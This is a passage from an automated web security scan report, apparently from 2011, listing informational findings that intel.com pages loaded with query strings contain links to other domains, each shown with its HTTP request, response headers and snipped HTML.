Connection: close
Content-Length: 49289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<script type="text/javascript">try { document.domain = "intel.c
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.127. http://www.intel.com/p/en_US/business/partnerprograms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /p/en_US/business/partnerprograms

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/p/en_US/business/partnerprograms?iid=gg_work+home_partners
The response contains the following links to other domains:
  • http://www.facebook.com/IntelPartner
  • http://www.intc.com/index.cfm?iid=ftr+invrel
  • http://www.intelcommsalliance.com/kshowcase/view/
  • http://www.intelcommsalliance.com/roster

Request

GET /p/en_US/business/partnerprograms?iid=gg_work+home_partners HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Type: text/html; charset=UTF-8
IBM-Web2-Location: /p/portal/business/partners/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3iDABcTQ0N3A0sL_0BTA8_gEENXH3N3IwMTc30v_aj0nPwkoMpwkF7cag0MoPI4gKOBvp9Hfm6qfkF2cJCFo6IiADnVSkc!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Language: en
Server: IA Web Server
Vary: User-Agent
Vary: Cookie
Date: Sat, 05 Feb 2011 23:20:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<script type="text/javascript">try { document.domain = "intel.c
...[SNIP]...
<p>
   <a href="http://www.intelcommsalliance.com/kshowcase/view/">Intel.. Embedded Alliance Solutions Center</a>
...[SNIP]...
<p>
   <a href="http://www.intelcommsalliance.com/kshowcase/view/">Discover recent innovations resulting from Embedded partnerships</a>
...[SNIP]...
<p>
   <a href="http://www.intelcommsalliance.com/roster">Embedded</a>
...[SNIP]...
<p>
   <a href="http://www.facebook.com/IntelPartner">Intel.. Software Partner Program on Facebook</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.128. http://www.intel.com/p/en_US/business/technology  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /p/en_US/business/technology

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/p/en_US/business/technology?iid=gg_work+home_technology
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /p/en_US/business/technology?iid=gg_work+home_technology HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Type: text/html; charset=UTF-8
IBM-Web2-Location: /p/portal/business/technology/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3iDABcTQ0N3A0sL_0BTA8_gEENXH3N3IwNDE6B8JG55AwMCur30o9Jz8pOA9oSDbMZvElgeB3A00PfzyM9N1S_IjagMDkhXBABpMSwF/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Language: en
Server: IA Web Server
Vary: User-Agent
Vary: Cookie
Date: Sat, 05 Feb 2011 23:20:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000Fdh-NVqv5wap6wu0Nf5Acy0:13pdbcbqh; Path=/
Content-Length: 42117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<script type="text/javascript">try { document.domain = "intel.c
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.129. http://www.intel.com/p/en_US/products  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /p/en_US/products

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/p/en_US/products?iid=gg_prod-en_US+products
The response contains the following links to other domains:
  • http://intelconsumerelectronics.com/?iid=subhdr+prodtop_conselec
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /p/en_US/products?iid=gg_prod-en_US+products HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Type: text/html; charset=UTF-8
IBM-Web2-Location: /p/portal/business/products/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3iDABcTQ0N3A0sL_0BTA8_gEENXH3N3IwMfA6B8JG55AwMCur30o9Jz8pOA9oSDbMZvElgeB3A00PfzyM9N1S_IjagMDkhXBAAAgKtF/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Language: en
Server: IA Web Server
Vary: User-Agent
Vary: Cookie
Date: Sat, 05 Feb 2011 23:20:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<script type="text/javascript">try { document.domain = "intel.c
...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_prod_top_col1_7"><a href="http://intelconsumerelectronics.com/?iid=subhdr+prodtop_conselec">Consumer Electronics</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.130. http://www.intel.com/p/en_US/products/server  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /p/en_US/products/server

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/p/en_US/products/server?iid=gg_work+home_servers
The response contains the following links to other domains:
  • http://intelconsumerelectronics.com/?iid=subhdr+prodtop_conselec
  • http://www.esaa-members.com/
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /p/en_US/products/server?iid=gg_work+home_servers HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Type: text/html; charset=UTF-8
IBM-Web2-Location: /p/portal/products/category/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3iDABcTQ0N3A0sL9zBzA89gbz-PMP9QY3dLc30v_aj0nPwkoMpwkF6zeGd3Rw8Tcx8DA__QECcDozBLE39HXycjAwMDiLwBDuBooO_nkZ-bql-QHRxk4aioCADPlaQj/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Language: en
Server: IA Web Server
Vary: User-Agent
Vary: Cookie
Date: Sat, 05 Feb 2011 23:20:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<script type="text/javascript" >
var po
...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_prod_top_col1_7"><a href="http://intelconsumerelectronics.com/?iid=subhdr+prodtop_conselec">Consumer Electronics</a>
...[SNIP]...
<li>
       <a href="http://www.esaa-members.com/" target="_blank">Intel.. Enabled Solutions Acceleration Alliance (Intel.. ESAA) configuration guides</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.131. http://www.intel.com/p/en_US/support  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /p/en_US/support

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/p/en_US/support?iid=gg_support-en_US+home_support
The response contains the following link to another domain:
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /p/en_US/support?iid=gg_support-en_US+home_support HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Type: text/html; charset=UTF-8
IBM-Web2-Location: /p/portal/support/home/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3iDABcTQ0N3A0sL9zBzA89gbz-PMP9QY3cjA30v_aj0nPwkoMpwkF6zeENHM3ewWn-fUCMDTwvHoEBndw8Dd1dTiLwBDuBooO_nkZ-bql-QHRxk4aioCADNz5hM/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Content-Language: en
Server: IA Web Server
Vary: User-Agent
Vary: Cookie
Date: Sat, 05 Feb 2011 23:20:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<script type="text/javascript">try { document.domain = "intel.c
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.132. http://www.intel.com/portugues/business/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /portugues/business/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/portugues/business/index.htm?iid=gg_pt_BR+noscript
The response contains the following links to other domains:
  • http://www.intc.com/index.cfm?iid=ftr-BR+invrel
  • http://www.nextgenerationcenter.com/

Request

GET /portugues/business/index.htm?iid=gg_pt_BR+noscript HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:18:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 33103

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
<head>
<meta http-equiv=Content-Type content="text/html; charset=UTF-8">
...[SNIP]...
<li><a href="http://www.nextgenerationcenter.com" target="_blank">Next Generation Center: Treinamentos de TI e muito mais</a>
...[SNIP]...
<p>
                   <a href="http://www.nextgenerationcenter.com" target="_blank">Next Generation Center</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr-BR+invrel">Rela....es com o Investidor</a>
...[SNIP]...

17.133. http://www.intel.com/products/chipsets/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /products/chipsets/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/products/chipsets/index.htm?iid=gg_prod-en_US+chipsets
The response contains the following links to other domains:
  • http://intelconsumerelectronics.com/?iid=subhdr+prodtop_conselec
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /products/chipsets/index.htm?iid=gg_prod-en_US+chipsets HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:19:24 GMT
Content-Length: 31537
Connection: close

<!DOCTYPE html public "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML lang="en-US">
<HEAD>
<meta http-equiv=Content-Type content="text/html; charset=utf-8">

...[SNIP]...
<li class=" gaat40-null" id="gaat40-sbhdr_prod_top_col1_7"><a href="http://intelconsumerelectronics.com/?iid=subhdr+prodtop_conselec">Consumer Electronics</a>
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.134. http://www.intel.com/products/desktop/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /products/desktop/index.htm

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.intel.com/products/desktop/index.htm?iid=gg_prod-en_US+desktop
The response contains the following links to other domains:
  • http://intelconsumerelectronics.com/?iid=subhdr+prodtop_conselec
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /products/desktop/index.htm?iid=gg_prod-en_US+desktop HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
